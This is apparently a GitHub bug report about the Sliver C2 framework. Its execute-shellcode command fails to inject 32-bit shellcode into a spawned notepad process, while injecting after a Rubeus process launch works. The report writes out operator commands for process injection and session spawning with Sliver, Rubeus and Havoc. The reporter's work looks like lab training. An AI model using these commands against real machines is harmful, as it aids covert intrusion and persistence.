BishopFox
32 bit shellcode does not execute with execute-shellcode but with Rubeus
Describe the bug Trying to shift from one process to another in a 32 bit shellcode using execute-shellcode does not work. Doing the same with Rubeus, launching the process and manually injecting into it, works fine.
To Reproduce Steps to reproduce the behavior:
- Get a 32-bit session within sliver
execute-shellcode -n C:\\windows\\SysWOW64\\notepad.exe -A 386 -i /home/kali/OSEP/hav0c/sliver.x86.bindoes not work and hangs indefinitelyrubeus -t 20 -- createnetonly /program:C:\\windows\\SysWOW64\\notepad.exeexecute-shellcode -p 4776 -A 386 /home/kali/OSEP/hav0c/sliver.x86.bin- Commands 4 & 5 should work and give us a new session
Expected behavior The execute-shellcode command should have launched another session using the 32 bit notepad process specified.
Screenshots
Working
Hangs forever
Desktop (please complete the following information):
- OS: Kali Linux
- Version 2024.4
Additional context
Also, I have noticed whenever I use -i flag for interactive, I have to press Ctrl + C and run sliver again, the last one does not take any commands later on.
While we're on this topic, is there a way to switch from 32 bit session to 64? In havoc I can do
shellcode spawn x64 /home/kali/OSEP/hav0c/demon.x64.bin
While in sliver, even if I create a 64 bit process and inject into it with right architecture, I do not get any shell back.
rubeus -t 20 -- createnetonly /program:C:\\windows\\system32\\notepad.exe
execute-shellcode -p 5024 -A amd64 /home/kali/OSEP/hav0c/sliver.x64.bin